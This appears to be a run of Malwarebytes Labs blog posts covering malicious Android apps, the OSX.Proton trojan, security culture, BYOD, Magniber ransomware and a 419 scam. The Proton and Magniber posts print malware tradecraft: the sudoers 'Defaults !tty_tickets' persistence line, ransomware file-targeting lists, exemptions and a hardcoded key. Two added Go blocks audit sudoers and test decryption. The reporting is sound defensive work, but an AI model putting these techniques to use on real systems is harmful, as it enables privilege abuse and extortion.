Oct 20, 2017

More trouble in Google Play land

This is not a good week for Google, it seems.

After our mobile security experts repeatedly discovered adware in several apps on the Google Play store, our friends at Symantec have unearthed at least eight malicious apps capable of adding affected mobile devices to a botnet. According to their blog post, the apps have been downloaded and installed onto 2.6 million smartphones, tablets, and possibly some IoT devices.

Threat actors behind the bogus apps have banked on the popularity of Minecraft, a sandbox video game with a user base of 100 million. They specifically targeted Minecraft: Pocket Edition (PE), which launched in 2015. Symantec explained how the malicious apps work:

The app connects to a command and control (C&C) server on port 9001 to receive commands. The C&C server requests that the app open a socket using SOCKS and wait for a connection from a specified IP address on a specified port. A connection arrives from the specified IP address on the specified port, and a command to connect to a target server is issued. The app connects to the requested target server and receives a list of ads and associated metadata (ad type, screen size name). Using this same SOCKS proxy mechanism, the app is commanded to connect to an ad server and launch ad requests.

There is no functionality within the application to display ads.

Given the large number of devices affected, it’s possible for the threat actors to also leverage them for DDoS attacks. This is not a new concept—using mobile devices to launch a crippling blow to websites and networks has been done before.

To minimize the possibility of downloading apps that are not behaving like they’re supposed to, consult our list of safe practices when using your mobile device. Meanwhile, users of Malwarebytes for Android who have updated to the latest version are already protected. We detect the malicious apps as Android/

Stay safe, everyone!

The post More trouble in Google Play land appeared first on Malwarebytes Labs.


Oct 20, 2017

Mac malware OSX.Proton strikes again

The hackers responsible for the Mac malware OSX.Proton have struck again, this time infecting a copy of the Elmedia Player app that was being distributed from the official Eltima website. At this time, it is still unknown how long their website was providing the hijacked app.

Proton was silently added to Apple’s XProtect definitions in early March, and not much was known about it at the time. Then, in May, one of the servers responsible for distributing the popular Handbrake software was hacked, resulting in the distribution of a Proton-infected copy of Handbrake for a four-day period. Now, Eltima Software has fallen victim to a similar attack.

Researchers at ESET discovered the trojanized copy of Elmedia Player on Thursday morning, and Eltima Software eliminated the malware from their servers by that afternoon. However, an unknown number of people have already downloaded the malicious copy of Elmedia Player and will be infected with Proton.

The malicious Elmedia Player app looks completely legitimate, even when opened. This is because the Trojanized app is actually a wrapper, containing the real Elmedia Player application. When the malicious wrapper is opened, it opens the legitimate app as a cover to make it seem like everything is working as expected.

In the following screenshot, you can see the contents of the legitimate Elmedia Player app in the lefthand window, compared to the malicious wrapper app on the right.

This is a bit different from the technique used to Trojanize Handbrake. Because Handbrake is open source, the hackers were able to compile a malicious copy of the Handbrake app that installed the Proton malware but otherwise behaved normally.

In this case, however, Elmedia Player is not open source, so the hackers changed their methods to open an untampered copy of the real application. To avoid suspicion by having two different Elmedia Player apps showing up on the Dock, the malicious wrapper app has the following setting in its Info.plist file:


This means that the malicious app is treated as more of a background process, hidden from the Dock and the Force Quit window, eliminating one potential cause for user suspicion.

The only place that the malicious application differs from the legitimate one, as with the Handbrake hack, is a password request when the app launches.

Malware researcher @noarfromspace also noticed that Eltima Software’s Folx application is also affected, which we have confirmed. Since Eltima Software has cleaned up their systems at this point, it is not known how many of their other apps may also have been affected.

The maliciously-modified Eltima apps are all signed using an Apple developer certificate issued to a “Clifton Grimm.” That certificate has been revoked at this point, rendering those apps inoperable.

Malicious behaviors

As with the variant that was dropped by the hacked copy of Handbrake (Proton.B), this variant (Proton.C) will also attempt to exfiltrate the keychains and 1Password vaults containing user passwords and other sensitive information, as well as browser information, including login credentials for those who use browser functionality to remember their passwords.

However, Proton.C will also collect a number of other pieces of data. It will exfiltrate several different cryptocurrency wallets, giving the hackers the ability to steal digital money, such as Bitcoin, from the user. It also grabs other data that could be used to connect to sensitive online resources accessible to the user.

In addition, as part of the infection process, Proton.C will add a line to the sudoers file, which manages access to root privileges:

Defaults !tty_tickets

Normally, when a user authenticates for root privileges with sudo in a terminal, those privileges apply only within that single terminal window (session) and nowhere else. Adding this line to the end of the sudoers file lets the malware authenticate once and then use root privileges across all sessions.
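An audit check for the setting described above, written here as an added example (not Malwarebytes’ code and not part of the original post): it parses sudoers text the way an administrator would want to when looking for this change, joining backslash-continued lines, ignoring comments and splitting comma-separated option lists, and reports every Defaults entry that disables tty_tickets. The sample sudoers content is constructed.

```go
package main

import (
	"fmt"
	"strings"
)

// Finding records one Defaults entry that disables tty_tickets.
type Finding struct {
	Line  int    // 1-based line where the entry starts
	Entry string // the logical entry, continuation lines joined
}

// stripComment removes a trailing '#' comment unless the line is an
// #include/#includedir directive, which sudoers also spells with '#'.
func stripComment(line string) string {
	t := strings.TrimSpace(line)
	if strings.HasPrefix(t, "#include") {
		return t
	}
	if i := strings.IndexByte(line, '#'); i >= 0 {
		return line[:i]
	}
	return line
}

// FindTTYTicketsDisabled scans sudoers text for Defaults entries that turn
// off tty_tickets. It accepts every Defaults form (Defaults, Defaults:user,
// Defaults@host, Defaults!cmd, Defaults>runas) and the "! tty_tickets"
// spelling with whitespace after the bang.
func FindTTYTicketsDisabled(sudoers string) []Finding {
	var findings []Finding
	var buf strings.Builder
	start := 0
	for i, raw := range strings.Split(sudoers, "\n") {
		line := stripComment(raw)
		if buf.Len() == 0 {
			start = i + 1
		}
		// A trailing backslash continues the entry on the next line.
		if s := strings.TrimRight(line, " \t"); strings.HasSuffix(s, `\`) {
			buf.WriteString(strings.TrimSuffix(s, `\`))
			buf.WriteByte(' ')
			continue
		}
		buf.WriteString(line)
		entry := strings.TrimSpace(buf.String())
		buf.Reset()
		if entry == "" || !strings.HasPrefix(entry, "Defaults") {
			continue
		}
		// Separate the Defaults head (possibly Defaults:user etc.) from the options.
		head := strings.FieldsFunc(entry, func(r rune) bool { return r == ' ' || r == '\t' })
		if len(head) < 2 {
			continue
		}
		opts := strings.TrimSpace(strings.TrimPrefix(entry, head[0]))
		for _, opt := range strings.Split(opts, ",") {
			opt = strings.TrimSpace(opt)
			if strings.HasPrefix(opt, "!") {
				opt = "!" + strings.TrimSpace(opt[1:])
			}
			if opt == "!tty_tickets" {
				findings = append(findings, Finding{Line: start, Entry: entry})
				break
			}
		}
	}
	return findings
}

// Constructed sample: a typical macOS sudoers with the line Proton.C appends.
const sampleSudoers = `# sudoers file.
Defaults	env_reset
Defaults	env_keep += "BLOCKSIZE"
root ALL = (ALL) ALL
%admin ALL = (ALL) ALL
#includedir /private/etc/sudoers.d
Defaults !tty_tickets
`

func main() {
	for _, f := range FindTTYTicketsDisabled(sampleSudoers) {
		fmt.Printf("line %d: tty_tickets disabled by %q\n", f.Line, f.Entry)
	}
}
```

On a real system the same function would be run over /etc/sudoers and every file in the includedir, since the directive is honoured wherever it appears.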

Am I infected?

Unfortunately, we don’t know yet how long Eltima Software’s systems have been serving up Trojanized software. However, if you have downloaded any software from Eltima Software recently, you should check to see if your system is infected. The easiest method for identifying an infection would be to install Malwarebytes for Mac, which will detect and remove Proton.C for free.

You can also check by choosing Go to Folder from the Go menu in the Finder, and entering the following path:


Then click the Go button. If the Finder complains that “The folder can’t be found,” that means you’re probably not infected—assuming, of course, that you didn’t make a mistake entering the path. This is not a method we recommend to most people, due to the possibility of human error resulting in an erroneous belief that the system is clean.

If you find an infection, be sure to delete any Eltima Software applications from your system, even if they are not detected by antivirus software, just to be completely sure. It should be safe to re-download clean copies at this point.

What happens if I’m infected?

If you are infected, the first priority is to get the malware off your system.

After you have done that, you will need to begin the far harder process of remediating the effects of the breach. You should assume that every password to every online account has been compromised, and should change them all. A good password manager, such as 1Password, will help immeasurably with this. If you’re not already using such a program, we recommend that you start now. (And don’t store the master password for your password manager in the macOS keychain!)

If you have any cryptocurrency wallets, you will need to take fast action to lock those down, before the criminals behind this malware clean you out. If you had any credit card or other financial account numbers stored in the keychain or in 1Password, contact those financial institutions immediately so that those accounts can be frozen, monitored, or changed.

For those with affected business machines, you need to alert your IT admins immediately. This malware may have given the hackers the keys needed to access some or all of your company’s internal resources, which could lead to your company suffering from a breach—possibly one that results in your company spreading another variant of Proton if you work at a software company.

If people act quickly to remediate, they can lessen the impact of this particular malware and stop the infection from spreading.

The post Mac malware OSX.Proton strikes again appeared first on Malwarebytes Labs.


Oct 19, 2017

How to create an intentional culture of security

In this day and age, companies great and small are exposed every day to potential attacks. From insider threats to simple phishing, one is always left guessing whether they know enough to handle them or are well prepared to face the risks. Educating your staff about basic computing hygiene is one thing, but ingraining in them security practices that they follow almost naturally, even beyond the confines of the office, is another. The latter involves being part of a culture where people think, act, and behave the same way. And we’re not just talking about an organic culture, but one that was created with intentionality at the core.

Before going further, let’s first find out why it’s important that we create and cultivate an intentional culture of security. We’ll also name a few misconceptions surrounding security culture and attempt to clear up each one.

Why a culture of security is needed

A culture of security in the workplace has always existed, even in the pre-computing era, although it was mainly about physical security. A large area of the office is off-limits to the public, and only those with an access card or proper company identification can go in and out. Not everyone has the key to the HR filing cabinets. And when computers were introduced in the business world, confidential files shared among managers and executives were (and still are) for their eyes only.

Things have changed dramatically since then. Businesses maintain the physical defenses of their assets, but are hard-pressed to stave off threats from the digital realm. There is now a need for organizations to secure their online assets, but criminals have become adept at circumventing basic protections. Regardless of this, the negative perception people have about security—it’s reactionary, it hinders one from conveniently doing their job—persists today. This negativity is a dominant hindrance in further establishing and sustaining a culture of security.

It’s important to have a strong security culture because security is a strategic necessity, whether it’s protecting the data of customers or building relationships and offering services to other business clients. As such, trust is essential. Without sufficient security present in an organization, those doing business with companies would be doubtful and uncertain that their assets are treated with importance and utmost confidentiality as they should. (Note how Equifax stock dropped dramatically after their massive breach was discovered.)

On the other hand, a company with sufficient security has the advantage over competitors that do not have one. When data and assets are protected, trust increases.

Finally, having a security culture in place makes compliance with laws and regulations easier. As regulators start imposing security practices that, frankly, should have been present in companies to begin with, organizations with a security mindset are more receptive to adopting these practices and imbibing them into the current culture.


Misconceptions about a security culture

A culture of security could mean different things to different people. And just like any concept we strive to understand, there are misconceptions about them along the way. If left alone, these misunderstandings could persist, be passed on, or (worse) be treated as facts in the long run. We’ve identified and debunked some of them below.

  • The culture aims to maximize security. A majority of us assume that to improve on security, a company must make use of all security tools at their disposal. Again, this might work with organizations that handle information that is deemed sensitive and valuable, but it doesn’t apply to all companies. A culture aims to optimize security. This means making the most efficient use of resources that are available to them.
  • Having a culture of security in place will stop breaches dead. Unfortunately, this is not a guarantee. People, even well-meaning ones, make mistakes. And often, those errors can cost companies big. A culture of security does not create perfect security; however, it paves the way towards achieving best-possible security. This cannot be accomplished without people in the workplace supporting the concept.
  • A culture of security is IT’s responsibility. On the contrary, every member of the organization is responsible for its security, including the assets it uses, processes, and shares. Everyone plays a part, and no one is exempted. IT can put in place all the technological checks and balances to ward off attacks, but if a user mindlessly clicks on a phishing email, it’s game over. Although some may still choose to ignore culture and policy, this point doesn’t make it more valid.
  • A culture of security must start from the top. It’s a brilliant idea for senior management to not just talk the talk but also walk the walk, but culture doesn’t necessarily have to start with the higher-ups. What it needs are people committed enough to continue to nurture good security practices that are aligned with the organization’s objectives and well integrated with other cultures. This is why these committed people are dubbed champions.

Practical steps to foster a culture of cybersecurity

1. Recognize that security is seen in a negative light; thus, there is a need to help others realize that it’s actually a positive enabler of the company’s initiatives. This is especially true for companies in industries that handle a lot of sensitive personally identifiable information (e.g., banks, hospitals, and intelligence agencies). It’s true that when one thinks of security (or the lack thereof), we often think of preventing fraud, breaches, and hacking. However, trust, consistency, reliability, productivity, and predictability are also terms that we can associate with security. Champions should frame it as such.

2. Assess the current state of the organization’s security culture. Like we said earlier, a culture of security has always existed. But whether the culture is good or bad is another question entirely. Security champions within the company must discover the gaps, and then figure out how to bridge them.

3. Create a positive brand for the security culture. Champions can enlist the help of marketing in this. Think of one thing employees might gravitate to (Cat videos? Outdoor activities? Battlestar Galactica?), and use it to convey a unified message to the organization. Then, to further develop the brand, tailor the message according to the benefits of security for each department. Branding can be broadcast via internal memos and newsletters, screensavers, and even posters that employees can see wherever they go.

4. Hold awareness campaigns to educate would-be champions. Here’s the twist: Don’t start on the wrong foot by, say, introducing statistics about hacking and phishing. Instead, the champion should educate their peers on what security is, what their specific roles in it are, and how accountable they are to the company’s resources (e.g., information) that they handle. If one doesn’t know how to fulfill his/her responsibility, further education may be needed.

5. Reward those who support a culture of security. This should also include decision-makers who make it a point to consider the security of information and other valuable enterprise assets before giving a plan the go signal. Although some seek monetary incentive, many do not. At the very least, the champion (and the company) must recognize and attribute a good outcome based on security mindfulness when they see one.

Oh, and one more thing

We believe and often parrot the adage “People are the weakest link.” That the security problem exists between the chair and the monitor. Sadly, this negative notion has affected how we continue to perceive and respond to our peers at work who clicked that link, to clients who are asking for support on a simple matter, even to our younger and older family members who aren’t as technologically savvy as we are. One purpose of fostering a culture of security is not to address them as the weakest link, but instead make people realize that they are our only link in security. A collective understanding that security is supposed to work for people and for the organization, not the other way around, is something that we should all aim and strive to achieve.


The post How to create an intentional culture of security appeared first on Malwarebytes Labs.


Oct 19, 2017

BYOD, why don’t you?

Bring Your Own Device (BYOD) is a policy that allows employees to bring their own devices to the workplace and use them there. At one time, this was the latest bonus to attract and keep employees happy—plus save a few bucks. Nowadays the question is more like: Is there anyone who doesn’t bring his own device (at least a smartphone) to the workplace?

But BYOD is more than just bringing your device along. The expression also implies that you can use your own device to access and use corporate resources. But what are the security issues that this policy opens up for both parties?

The risks for the company

  • People outside the company get access. Access by someone outside of the company can happen due to devices being stolen or by people leaving the company.
  • Devices leave the company environment. Outside the company environment, the devices are still carrying important information and may be used to access insecure networks elsewhere.
  • Devices might not be protected or patched. BYOD devices might not be protected as well as the devices that are under the control of the company’s IT department. This works both ways, since many companies have a slow patching process to keep legacy applications running and to allow for testing before patches and updates are rolled out. Either way, a discrepancy in updates and patches can result in problems for both sides.

The risks for the employee owner

  • This limits the use of the device outside the company. The employee has to be more vigilant than they might be if they didn’t use the device for company matters. For example, browsing in a coffee shop on an open network might be prohibited, or at least dangerous, on that device.
  • Who is to blame in case of leaks? Pointing the finger for who is to blame, or fearing the repercussions, can ruin a healthy work relationship. Employees might be more liable if they used a BYOD device instead of a work-issued one.
  • There might be a discrepancy in patching and updates. The employee may have to wait before patching or updating their operating system or the applications that are used in the workplace. This leaves both their work and personal data vulnerable.

Mitigating the risks

To limit the downside and keep possible damage to a minimum, it helps to:

  • Have a clear policy and rules to enforce it. A well thought out policy about BYOD allows you to set rules that everyone understands—not only understand what the rules prescribe, but also why they are needed.
  • Have an active mobile device management solution. Even if there are no mobile devices owned by the company itself, there needs to be mobile device management to keep the company-controlled data and applications separated from the private ones.
  • Use strong authentication and encryption methods. A suitable method of strong authentication enables you to shut out the owners of stolen devices and terminated accounts. Encryption can also keep your communications and data safe from prying eyes.

Allowing your staff to BYOD has mutual benefits, but we recommend taking some precautions if you don’t want the downside to outweigh the good. Being aware of the potential dangers is important, but only a small part of what needs to be done. Securing personal devices at the workplace and securing workplace devices at home is equally important, as well as creating and implementing a strong cybersecurity policy that covers this type of flexibility. Take these steps and you can better enjoy a less cumbersome, more fluid work environment.

The post BYOD, why don’t you? appeared first on Malwarebytes Labs.


Oct 18, 2017

Magniber ransomware: exclusively for South Koreans

The Magnitude exploit kit has been pretty consistent over the last few months, dropping the same payload—namely, the Cerber ransomware—and targeting a few select countries in Asia. Strangely, Magnitude EK disappeared in late September, and for a while we wondered whether this was yet another casualty in the already deflated exploit kit scene.

However, a few days ago Magnitude EK resurfaced, this time with a new payload. The delivered malware is also a ransomware, but of a family that was not known before. It has been named Magniber.

This Magniber ransomware is highly targeted, as it checks at several levels (external IP, the language installed, etc.) to ensure that the attacked system is only South Korean. Targeting a single country is unusual on its own, but performing multiple checks to be sure of the country and language of origin makes this a first for ransomware.

Analyzed samples

Older sample

Distribution method

So far, we found this ransomware is dropped only by the Magnitude exploit kit:

No other distribution method is known at the moment.

Behavioral analysis

If the malware is executed on non-Korean systems, the only thing we can see is the operation of deleting itself, delayed by running the ping command:

It only starts its malicious operations on systems where the Korean language is detected. The executable is pretty noisy, because it implements various tasks by running command-line tools. Running it in the sandbox, we can see the following graph of calls:

The malware copies itself in %TEMP% and deploys itself with the help of task scheduler:

In the same folder, we can also see the ransom note and yet another file. Its name is the same as the part of the domain that was generated for the particular user, and its extension is the same as the extension of the encrypted files:

Each encrypted file gets an extension composed of lowercase Latin letters; it is constant for the particular sample of Magniber.

The same plaintext produces the same ciphertext. This means each and every file is encrypted using exactly the same key (and, as shown later, the same initialization vector), with no per-file randomness.

Below, we demonstrate a visualization of bytes of a sample BMP file before and after being encrypted by Magniber:

As you can see, there are no visible patterns in the encrypted version; it suggests that some strong algorithm has been used, probably AES in CBC mode.

At the beginning of each encrypted file, we find a 16-character long identifier that is constant for the particular sample of Magniber:

After the encryption of all the found files is done, the ransomware runs notepad, displaying the dropped ransom note:

The ransom note is in the TXT format and its structure is minimalistic. It gives four alternative addresses pointing to the page for the victim.

Page for the victims

The page for the victims is in English only. Its template is very similar to the one used by the Cerber ransomware (this is the only similarity between those ransomware families—internally they are quite different):

Network communication

We found Magniber connecting to domains that are generated by its built-in algorithm. The same domains that are used as CnC are later used for the individual websites for the victim (only they are called with a different parameter). Examples of the called URLs:

Compare the URLs from the ransom note with the corresponding run:

At the beginning of the execution, the ransomware sends a request to the URL ending with new1 (or new0). At the end of the execution, it requests end1 (or end0). The meaning of those URLs will be explained in detail in the next part of the article.

What’s interesting is that the server gives a valid response if, and only if, the public IP of the victim was Korean. Otherwise, the response is empty. Example of the captured initial request and response (the request was made from the Korean IP):

In the response, we get a 16-character long, random string: ce2KPIak3cl6JKm6. The new random URL can be requested only once. If we try to repeat the request, we will get an empty response.

The other request (the ending one) also gives a 16-character long, random string in response. But contrary to the first one, it responds on every request (a different random string each time). Example of the ending request and response:

Inside the code

As always, to understand what is really going on here, we will have to take a deeper dive inside the code.

Magniber is delivered packed by various crypters, and the unpacking method will depend on the crypter’s features. You can see the process of unpacking the current sample in the video below.

After defeating the first layer, we obtain the second PE file: the malicious core. The core does not contain any advanced obfuscation. The authors made the strings just slightly difficult to follow by loading them into memory character by character:

Execution flow

Looking inside the unpacked payload, we can clearly see why it doesn’t run on most systems. At the beginning, there is a language check (using the API function GetSystemDefaultUILanguage):

The only accepted UI language is Korean (code 1042). If any other language is detected, the sample just deletes itself and causes no harm. This language check has been added in the recent Magniber samples and was not found in the earlier versions, such as aa8f077a5feeb9fa9dcffd3c69724c942d5ce173519c1c9df838804c9444bd30.

After the check is passed, Magniber follows with a typical ransomware functionality. Overview of the performed steps:

  1. Creates mutex
  2. Checks in the temp folder if the marker file has been dropped
  3. Drops the copy of itself in %TEMP% and adds the scheduled task
  4. Queries the generated subdomains to retrieve the AES key (if retrieving the key failed, loads the hardcoded one)
  5. Enumerates and encrypts files with the selected extensions
  6. Reports finishing the task to the CnC
  7. Executes the notepad displaying the ransom note
  8. Deletes itself

What is attacked?

The list of extensions attacked by Magniber is really long. It includes documents, source code files, and many others. The complete list is below:

docx xls xlsx ppt pptx pst ost msg em vsd vsdx csv rtf 123 wks wk1 pdf dwg 
onetoc2 snt docb docm dot dotm dotx xlsm xlsb xlw xlt xlm xlc xltx xltm pptm 
pot pps ppsm ppsx ppam potx potm edb hwp 602 sxi sti sldx sldm vdi vmx gpg 
aes raw cgm nef psd ai svg djvu sh class jar java rb asp php jsp brd sch dch 
dip vb vbs ps1 js asm pas cpp cs suo sln ldf mdf ibd myi myd frm odb dbf db 
mdb accdb sq sqlitedb sqlite3 asc lay6 lay mm sxm otg odg uop std sxd otp 
odp wb2 slk dif stc sxc ots ods 3dm max 3ds uot stw sxw ott odt pem p12 csr 
crt key pfx der 1cd cd arw jpe eq adp odm dbc frx db2 dbs pds pdt dt cf cfu 
mx epf kdbx erf vrp grs geo st pff mft efd rib ma lwo lws m3d mb obj x3d c4d 
fbx dgn 4db 4d 4mp abs adn a3d aft ahd alf ask awdb azz bdb bib bnd bok btr 
cdb ckp clkw cma crd dad daf db3 dbk dbt dbv dbx dcb dct dcx dd df1 dmo dnc 
dp1 dqy dsk dsn dta dtsx dx eco ecx emd fcd fic fid fi fm5 fo fp3 fp4 fp5 
fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdn mdt 
mrg mud mwb s3m ndf ns2 ns3 ns4 nsf nv2 nyf oce oqy ora orx owc owg oyx p96 
p97 pan pdb pdm phm pnz pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq 
sqb stp str tcx tdt te tmd trm udb usr v12 vdb vpd wdb wmdb xdb xld xlgc zdb 
zdc cdr cdr3 abw act aim ans apt ase aty awp awt aww bad bbs bdp bdr bean 
bna boc btd cnm crw cyi dca dgs diz dne docz dsv dvi dx eio eit emlx epp err 
etf etx euc faq fb2 fb fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt gtp frt 
fwdn fxc gdoc gio gpn gsd gthr gv hbk hht hs htc hz idx ii ipf jis joe jp1 jrtf
kes klg knt kon kwd lbt lis lit lnt lp2 lrc lst ltr ltx lue luf lwp lyt lyx man 
map mbox me mel min mnt mwp nfo njx now nzb ocr odo of oft ort p7s pfs pjt prt 
psw pu pvj pvm pwi pwr qd rad rft ris rng rpt rst rt rtd rtx run rzk rzn saf 
sam scc scm sct scw sdm sdoc sdw sgm sig sla sls smf sms ssa sty sub sxg tab 
tdf tex text thp tlb tm tmv tmx tpc tvj u3d u3i unx uof upd utf8 utxt vct vnt 
vw wbk wcf wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wp wps wpt wpw wri wsc wsd wsh wtx
xd xlf xps xwp xy3 xyp xyw ybk ym zabw zw abm afx agif agp aic albm apd apm 
apng aps apx art asw bay bm2 bmx brk brn brt bss bti c4 ca cals can cd5 cdc 
cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib djv dm3 
dmi vue dpx wire drz dt2 dtw dv ecw eip exr fa fax fpos fpx g3 gcdp gfb gfie 
ggr gih gim spr scad gpd gro grob hdp hdr hpi i3d icn icon icpr iiq info ipx 
itc2 iwi j2c j2k jas jb2 jbig jbmp jbr jfif jia jng jp2 jpg2 jps jpx jtf jw 
jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs my ncr nct 
nlm nrw oc3 oc4 oc5 oci omf oplc af2 af3 asy cdmm cdmt cdmz cdt cmx cnv csy 
cv5 cvg cvi cvs cvx cwt cxf dcs ded dhs dpp drw dxb dxf egc emf ep eps epsf 
fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg
gem glox hpg hpg hp idea igt igx imd ink lmk mgcb mgmf mgmt mt9 mgmx mgtx 
mmat mat ovp ovr pcs pfv plt vrm pobj psid rd scv sk1 sk2 ssk stn svf svgz 
tlc tne ufr vbr vec vm vsdm vstm stm vstx wpg vsm xar ya orf ota oti ozb 
ozj ozt pa pano pap pbm pc1 pc2 pc3 pcd pdd pe4 pef pfi pgf pgm pi1 pi2 pi3 
pic pict pix pjpg pm pmg pni pnm pntg pop pp4 pp5 ppm prw psdx pse psp ptg 
ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric riff rix rle rli
rpf rri rs rsb rsr rw2 rw s2mv sci sep sfc sfw skm sld sob spa spe sph spj 
spp sr2 srw wallet jpeg jpg vmdk arc paq bz2 tbk bak tar tgz gz 7z rar zip 
backup iso vcd bmp png gif tif tiff m4u m3u mid wma flv 3g2 mkv 3gp mp4 mov
avi asf mpeg vob mpg wmv fla swf wav mp3 

The list loads at the beginning of the file encrypting function:

As usual, some of the directories are exempted:

:\documents and settings\all users
:\documents and settings\default user
:\documents and settings\localservice
:\documents and settings\networkservice
local settings
public\music\sample music
public\pictures\sample pictures
public\videos\sample videos
tor browser
program files (x86)
program files
system volume information

How does the encryption work?

Magniber encrypts files with AES 128 bit in CBC mode. It is implemented with the help of Windows Crypto API.

The DGA and the victim ID

In the usual scenario, the malware tries to retrieve the AES key from the CnC by querying pseudo-random subdomains:

The pseudo-random part is used to uniquely identify the victim. It is generated by the following simple algorithm:

Each character is based on the tick count, converted to the given charset:

The number 0 or 1 is appended to the URL depending on whether the sample is running under a debugger (detected using a timing check).

Four domains are being queried for the key:

If any of them returns a 16-byte response, that response is treated as the valid key: it is copied to the buffer and used from then on. Otherwise, the malware falls back to the hardcoded key.

The default AES key and IV

The interesting thing is that each sample comes with an AES key hardcoded. However, it is used only as a backup when downloading the key from the CnC was for some reason impossible (which also happens when the public IP is not from Korea). The key is unique to each sample. In the currently analyzed sample, it is S25943n9Gt099y4K:

Similarly, the initialization vector is always hardcoded in the sample (it is never downloaded). The same 16-character string is also written at the beginning of each encrypted file. In the currently analyzed sample it is EP866p5M93wDS513:

The algorithm

First, the crypto context is initialized. The malware imports the key and sets the initialization vector with the help of the functions CryptImportKey and CryptSetKeyParam:

Encrypting the file:

The first write stores the 16-byte IV string at the beginning of the file. Then, the file is read chunk by chunk and encrypted using the Windows Crypto API.
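The recovery check this layout makes possible, as an added example in Go that is not Malwarebytes' decryptor and not the malware's code: it assumes the key and IV of the analyzed sample, the file layout described above (the IV string first, then the AES-128-CBC ciphertext), and PKCS#7 padding of the final block, which the post does not state. The encryption helper only builds a constructed test file in that layout.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
)

// Hardcoded key and IV of the sample analyzed in the post.
const (
	sampleKey = "S25943n9Gt099y4K"
	sampleIV  = "EP866p5M93wDS513"
)

// encryptLikeMagniber builds a constructed test file with the layout the post
// describes: the 16-byte IV string first, then the AES-128-CBC ciphertext.
// PKCS#7 padding of the final block is an assumption about the sample.
func encryptLikeMagniber(key, iv, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	out := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, padded)
	return append(append([]byte{}, iv...), out...), nil
}

// recoverFile checks whether an encrypted file starts with the sample's hardcoded
// IV (the fallback-key case) and, if so, decrypts the remainder with the
// hardcoded key. A padding failure means a different (downloaded) key was used.
func recoverFile(data []byte, key, iv string) ([]byte, error) {
	if len(data) < 2*aes.BlockSize || (len(data)-aes.BlockSize)%aes.BlockSize != 0 {
		return nil, errors.New("unexpected file length")
	}
	if !bytes.Equal(data[:aes.BlockSize], []byte(iv)) {
		return nil, errors.New("header does not match the sample's IV")
	}
	block, err := aes.NewCipher([]byte(key))
	if err != nil {
		return nil, err
	}
	body := make([]byte, len(data)-aes.BlockSize)
	cipher.NewCBCDecrypter(block, []byte(iv)).CryptBlocks(body, data[aes.BlockSize:])
	pad := int(body[len(body)-1])
	if pad < 1 || pad > aes.BlockSize ||
		!bytes.Equal(body[len(body)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return nil, errors.New("bad padding: file was not encrypted with this key")
	}
	return body[:len(body)-pad], nil
}

func main() {
	enc, _ := encryptLikeMagniber([]byte(sampleKey), []byte(sampleIV), []byte("constructed victim file"))
	got, err := recoverFile(enc, sampleKey, sampleIV)
	fmt.Printf("%q %v\n", got, err)
}
```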


Magniber ransomware is being distributed instead of Cerber from the same exploit kit, approaching the same targets. However, internally it has nothing in common with Cerber and is much simpler. The only feature that makes it unique is being so picky about the targeted country. For the first time, we are seeing country checks performed at various levels of execution.

This ransomware family appeared recently and probably is still under active development. We will keep an eye on its evolution and keep you informed.

The users of Malwarebytes for Windows (with real-time, anti-ransomware technology deployed) are protected against Magniber.


The post Magniber ransomware: exclusively for South Koreans appeared first on Malwarebytes Labs.

Powered by WPeMatico

Oct 18, 2017

419 scammer offers USD $60 million—and a free child

Scammers often come crawling out of the woodwork in all sorts of places you wouldn’t necessarily expect. This is to their advantage when trying to keep suspicion in check; after all, we’re pretty much pre-programmed to think 419 scams will only wander into our inboxes.

Twitter, though? That’s a little different. Oh, and this scammer also wants me to adopt his pretend son in return for 60 million USD, just to keep things firmly in the land of “this can’t be happening.”

Our tale begins with a Twitter DM (direct message) from a sock-puppet account designed to look like a member of the armed forces. This is a common 419 social media tactic during times of natural disaster, as potential victims may be more inclined to believe the fake account really is part of a relief effort—and could you send that $100 via wire transfer a little faster, please?

Our fake army general here isn’t interested in natural disasters; he begins outreach with a quoted message from the Pope, and a request to send a mail about something important:

Important discourse

I fired off a missive and received a reply a few days later from a second email account:

Welcome my dear, I received your letter and well understood by me, Due
to my present condition i am not available to care for my Son, and i
don’t want him to grow up in my family home, Now am facing medical
treatments which i never know if i will get feet from it, I want you
to take good care of my Son , in this case i directed you to receive
the sum of $60 Million usd from Africa development bank of Togo, so
that as soon as the funds entered into your account my Son will join
you. 13 years old boy. dearest I want you to keep this within you to
protect the project.

I will give you full contact information of the bank where the funds
deposited so that you will contact them and have to transfer the funds
to your account.

Provide me your personal details address and i code of your id card,
as i received it i will forward it to the bank and instruct to conduct
the funds to your account.

Best regards I expecting urgent reply as possible as you receive the message.

Yes, they really are offering to send me a 13-year-old. Hopefully not one of those really grumpy ones.

Now, this is pretty unusual as far as 419 scams go, so I had to dig into it a little more. Wasting the time of 419 scammers while waiting for email providers to shut down accounts is a valuable exercise, as every second spent with your own missives is more time spent keeping them away from actual victims. You have to be a little creative though, or they just won’t reply. Years of baiting has meant scammers are quite cautious these days, and anything “sensible looking” seems to send them running for the hills.

With that in mind:

anyone for quidditch?

I’m sorry.

Anyway, baiting a 419 scammer is a bit cat and mouse—you need to keep them interested by pretending to sound like you may conceivably fall for their ridiculous scam, but push it too far and they may realise they’re having their time wasted. As it happens, this guy was surprisingly enthusiastic about the noble sport of Quidditch and replied almost instantly:

A fine sport

